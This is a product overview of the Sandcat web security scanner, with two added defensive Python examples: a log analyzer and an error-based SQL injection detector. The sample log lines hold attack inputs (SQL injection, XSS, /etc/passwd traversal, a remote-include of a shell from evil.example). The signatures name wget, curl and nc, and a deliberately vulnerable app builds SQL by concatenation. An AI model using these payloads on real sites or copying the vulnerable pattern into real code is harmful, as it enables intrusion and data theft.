Sandcat is a hybrid web application security assessment suite that combines external (black-box) scanning of a live site with internal (white-box) scanning of its source code to find vulnerabilities such as XSS and SQL injection. Its database covers over 29,000 vulnerabilities, researched since 2003, affecting specific web applications and servers. In the independent WAVSEP 2011 benchmark, Sandcat's Free Edition ranked first among free and open-source tools for XSS detection and Sandcat Pro second among commercial tools, and Sandcat scored a 100 percent error-based SQL injection detection rate.
2. Sandcat Assessment Suite
What is Sandcat?
- Sandcat is a hybrid multilanguage web application security assessment suite
- A software suite that simulates web-based attacks
- Proactively guards an organization's web infrastructure against web application security threats
  - Finds the vulnerabilities before the hackers do
3. Sandcat Assessment Suite
Evolution
- Initially an evasion-capable web server scanner
  - With CGI/directory brute-force scanning and a very extensive database of checks (2001-2003)
- Added spidering and injection capabilities
  - Became a remote web application security scanner (2004)
- Added source code scanning capabilities (2008)
4. Sandcat Assessment Suite
How It Works
- Scans live websites for multiple classes of vulnerabilities: an external pen-test
  - This is the hacker's perspective (aka black-box)
- Scans the application's source code locally for the same classes of vulnerabilities: an internal code review (aka white-box)
- Combining both approaches gives what is called a hybrid analysis (or grey-box)
5. Sandcat Assessment Suite
Sandcat's hybrid multilanguage web application security scanning capabilities:
- External: Remote Scanner
  - HTML5-aware spider
  - JavaScript emulation
- Internal: Source Scanner
  - Scans any web app
6. Features
Core Functionality
- Concurrency/Scan Queue Support (multithreaded)
- Deep Crawling (Spidering)
  - Maps the entire web site structure (all links, forms, XHR requests and other entry points)
- Multiple Editions (Windows only)
  - GUI (Graphical User Interface)
  - CLI (Command-Line Interface)
  - Web Interface (Apache-based)
7. Sandcat Assessment Suite
Core Functionality
- Report Generation
  - Multiple formats and templates
  - Compliance mapping: OWASP Top 10, PHP Top 5, CWE/SANS Top 25, Payment Card Industry (PCI), etc.
  - Reports also include:
    - OSVDB references
    - CVE and CWE references
    - Charts
9. Vulnerability Coverage
Sandcat Database
- Over 460 remote web application security checks in over 24 categories of web attacks
  - XSS, SQL Injection, File Inclusion, Command Execution, etc.
- OWASP's Top Ten Most Critical Web Application Security Vulnerabilities and PHP Top 5 Vulnerabilities
10. Vulnerability Coverage
Sandcat Database
- Over 561 source checks, covering several types of web attacks:
  - SQL Injection
    - Both remote and source checks tailored to cover MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, SQLite, Firebird, Sybase...
  - Cross-Site Scripting (XSS), Arbitrary File Manipulation, Command Execution, File Inclusion (Local and Remote) and more
11. Vulnerability Coverage
Sandcat Database
- 29K (29 thousand) web vulnerabilities researched since 2003 affecting specific web applications/servers
- Examples:
  - StatPressCN Plugin for WordPress wp-admin/admin.php Multiple Parameter XSS (CVE-2011-0641)
  - PHPCMS 2008 data.php where_time Parameter SQL Injection (CVE-2011-0645)
12. Additional Components
Other Sandcat Components
- Sandcat Log Analyzer
  - Scans HTTP logs (created by web servers) for intrusion attempts
- Sandcat Apache/PHP Hardener
  - Scans Apache and PHP configuration files for weak security settings
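A worked illustration of what a log analyzer of this kind does, added here as an example and not the Sandcat Log Analyzer's own code: it parses Apache combined-format access log lines, URL-decodes each request twice so that double-encoded payloads are seen in their final form, and matches the decoded request against signatures for the attack classes the deck lists (SQL injection, XSS, file inclusion, command execution, path traversal). The log lines are constructed for this example and the signature list is a small, representative assumption.

```python
"""Scanning a web server's access log for intrusion attempts.

Added illustration, not the Sandcat Log Analyzer's code. Parses Apache
combined-format lines, URL-decodes each request twice (so double-encoded
payloads such as %253C appear in their final form) and matches the decoded
request against attack signatures. The log lines are constructed for this
example; the signature list is a small, representative assumption.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Signatures are applied to the *decoded* request line.
SIGNATURES = {
    "sql-injection": re.compile(
        r"'\s*(?:or|and)\s+[\w']+\s*=|union\s+select|information_schema|sleep\s*\(", re.I),
    "xss": re.compile(r"<script\b|javascript:|on(?:error|load)\s*=", re.I),
    "path-traversal": re.compile(r"\.\./|\.\.\\|/etc/passwd|boot\.ini", re.I),
    "file-inclusion": re.compile(r"=(?:https?|ftp|php|data):", re.I),
    "command-injection": re.compile(r"[;|`]\s*(?:cat|ls|id|wget|curl|nc)\b", re.I),
}

# Constructed sample: one clean request, several attack attempts, a POST
# whose body (not logged) could hide anything, and a double-encoded probe.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2011:13:55:36 -0300] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2011:13:55:40 -0300] "GET /products.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2011:14:02:11 -0300] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2011:14:02:15 -0300] "GET /download.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1809 "-" "curl/7.21.0"
192.0.2.9 - - [10/Aug/2011:14:10:02 -0300] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Aug/2011:14:10:30 -0300] "POST /wp-login.php HTTP/1.1" 302 0 "http://www.example.com/wp-login.php" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2011:14:12:00 -0300] "GET /cgi-bin/test.cgi?cmd=%253Bcat%2520%252Fetc%252Fpasswd HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""


def decode_request(url: str) -> str:
    """Decode twice: attackers double-encode to slip past single-pass filters."""
    return unquote(unquote(url))


def analyze_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that matches at least one signature."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        decoded = decode_request(m["url"])
        hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
        if hits:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "method": m["method"],
                "status": int(m["status"]), "url": m["url"],
                "decoded": decoded, "categories": hits,
            })
    return findings


def attackers(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count flagged requests per source IP, for prioritising a response."""
    return dict(Counter(str(f["ip"]) for f in findings))


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:<13} {f['status']} {','.join(f['categories']):<32} {f['decoded']}")
    print("per-IP:", attackers(hits))
```

Two caveats a practitioner should keep in mind. An access log records only the request line, so a payload carried in a POST body (the wp-login.php request above, for instance) is invisible to log analysis and needs the live scanner, application logs or WAF logs instead. And signature matching on decoded URLs produces false positives on sites whose legitimate parameters contain SQL-like or HTML-like text, so the output is triage input, not proof of compromise; the per-IP counts help decide where to look first.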
13. WAVSEP 2011 Comparison
WAVSEP Comparison
- Independent web application scanner accuracy tests produced every year by Shay Chen (OWASP Israel), an application security consultant
- The most comprehensive made so far (a total of 60 tools were included this year, including the leading commercial tools)
- What did we find out?
14. WAVSEP 2011 Comparison
Sandcat Accuracy Tests (August 2011)
- Among the best XSS vulnerability detection rates in the market
  - #1 when the Free Edition of Sandcat is compared with other free and open source tools
  - #2 when Sandcat Pro is compared to other commercial tools such as IBM AppScan, HP WebInspect and others
    - Sandcat Pro, AppScan and ParosPro top the WAVSEP benchmark charts with 100 percent or near-100 percent XSS detection rates
16. WAVSEP 2011 Comparison
Sandcat Accuracy Tests (August 2011)
- SQL Injection (SQLi)
  - Sandcat also scored a 100 percent error-based SQL Injection detection rate
    - Sandcat identified all of an additional large set of 80 error-based SQL Injection test cases (100% detection, both GET-based and POST-based)
    - Sandcat's SQL Injection checks cover several types of databases
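How error-based SQL injection detection of the kind benchmarked here works, added as an example for both the database-coverage slide and these WAVSEP SQLi results (illustration code, not Sandcat's): a deliberately vulnerable target is modelled in-process on sqlite3, the scanner appends a quote probe to each GET and POST parameter, and the response is matched against error signatures for several database engines. The endpoint and parameter names and the signature subset are assumptions made for the example.

```python
"""Error-based SQL injection detection as a black-box scanner performs it.

Added illustration, not Sandcat's code. A deliberately vulnerable target
is modelled in-process on sqlite3; the scanner appends a probe to every
GET/POST parameter and fingerprints the response against DB-specific
error signatures. Endpoint names, parameter names and the signature
subset are assumptions made for this example.
"""
import re
import sqlite3
from typing import Dict, List, Optional

# Representative error strings per engine (assumption: a small subset of
# what a scanner's signature database would hold).
DB_ERROR_SIGNATURES: Dict[str, List[str]] = {
    "MySQL": [r"You have an error in your SQL syntax", r"mysql_fetch_array\(\)"],
    "Oracle": [r"\bORA-\d{5}\b"],
    "PostgreSQL": [r"PostgreSQL.*ERROR", r"unterminated quoted string at or near"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string"],
    "Microsoft Access": [r"Microsoft JET Database Engine"],
    "SQLite": [r"sqlite3\.OperationalError", r"unrecognized token"],
    "Firebird": [r"Dynamic SQL Error"],
    "Sybase": [r"Sybase message \d+"],
}

# Probes that break out of numeric and quoted-string contexts.
PROBES = ["'", '"', "')"]


def fingerprint_db_error(body: str) -> Optional[str]:
    """Return the engine whose error signature appears in the response body."""
    for engine, patterns in DB_ERROR_SIGNATURES.items():
        if any(re.search(p, body, re.IGNORECASE) for p in patterns):
            return engine
    return None


class VulnerableApp:
    """Constructed target. /product (GET) and /login (POST) build SQL by
    string concatenation and echo the raw driver error into the response;
    /safe (GET) is parameterised and must not be reported."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
        self.db.executemany("INSERT INTO products VALUES (?, ?)",
                            [(1, "cat"), (2, "dog")])
        self.db.execute("CREATE TABLE users (name TEXT, pw TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin', 'secret')")

    def handle(self, method: str, path: str, params: Dict[str, str]) -> str:
        try:
            if (method, path) == ("GET", "/product"):
                sql = f"SELECT name FROM products WHERE id = {params.get('id', '0')}"
                rows = self.db.execute(sql).fetchall()
            elif (method, path) == ("POST", "/login"):
                user, pw = params.get("user", ""), params.get("pw", "")
                sql = f"SELECT name FROM users WHERE name = '{user}' AND pw = '{pw}'"
                rows = self.db.execute(sql).fetchall()
            elif (method, path) == ("GET", "/safe"):
                rows = self.db.execute("SELECT name FROM products WHERE name = ?",
                                       (params.get("q", ""),)).fetchall()
            else:
                return "404 Not Found"
            return "OK: " + ", ".join(r[0] for r in rows)
        except sqlite3.Error as exc:  # the leak that makes the bug error-based
            return f"500 {type(exc).__module__}.{type(exc).__name__}: {exc}"


def scan(app: VulnerableApp, method: str, path: str,
         params: Dict[str, str]) -> List[Dict[str, str]]:
    """Inject each probe into each parameter in turn. A parameter is reported
    only when the probe introduces a DB error that the unmodified request
    did not produce, which guards against pages that always print one."""
    findings: List[Dict[str, str]] = []
    if fingerprint_db_error(app.handle(method, path, params)):
        return findings  # noisy baseline: error-based detection is unreliable here
    for name, value in params.items():
        for probe in PROBES:
            mutated = dict(params, **{name: value + probe})
            engine = fingerprint_db_error(app.handle(method, path, mutated))
            if engine:
                findings.append({"method": method, "path": path, "param": name,
                                 "probe": probe, "db": engine})
                break  # one confirming probe per parameter is enough
    return findings


def run_demo() -> List[Dict[str, str]]:
    """Scan the three constructed endpoints; expect hits on /product and /login only."""
    app = VulnerableApp()
    results: List[Dict[str, str]] = []
    results += scan(app, "GET", "/product", {"id": "1"})
    results += scan(app, "POST", "/login", {"user": "admin", "pw": "x"})
    results += scan(app, "GET", "/safe", {"q": "cat"})
    return results


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['method']} {f['path']} param={f['param']} probe={f['probe']!r} db={f['db']}")
```

The baseline check matters: a page that always prints a database error would match every probe, so the scanner first confirms that the unmodified request is clean and reports a parameter only when the probe introduces the error. Error-based detection also depends on the application leaking the driver's message; when errors are suppressed, blind (boolean-based or time-based) checks are needed, which this example does not cover.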
17. WAVSEP 2011 Comparison
Sandcat Accuracy Tests (August 2011)
- Sandcat scored a 100 percent detection rate while running at half its capabilities
  - Only the black-box (remote) scanner was benchmarked; Sandcat's white-box (source code) scanning capabilities were not covered in the tests
18. Additional Highlights
Standards & Additional Info
- Sandcat is on the list of CVE-compatible products and services maintained by the MITRE Corporation, which created the standard
- Invited this year by the U.S. NIST (National Institute of Standards and Technology) to participate in the Static Analysis Tool Exposition (SATE)
  - SATE's goal: advance research in the field of static analysis tools
19. Additional Highlights
Standards & Additional Info
- Used by the U.S. Department of Defense
- Listed and covered in the Information Assurance Tools Report published this year (2011) by the U.S. Department of Defense's IATAC (Information Assurance Technology Analysis Center), alongside leading tools
20. Customers
Where they come from
- From over 26 countries, mainly the United States, United Kingdom and Canada
- From different markets and industries
  - Consulting, Education/Government, Finance, Banking and Insurance, High Technology & Software, Hospitality, Travel & Tourism, Telecommunications, etc.
21. Customers
Where they come from (Government & Military)
- NASA, US NOAA, US DoE (Department of Energy) and others
- US Navy, UK's Royal Air Force
- Intelligence agencies
  - CSE (Canada's intelligence agency)
  - CISEN (Mexico's intelligence agency)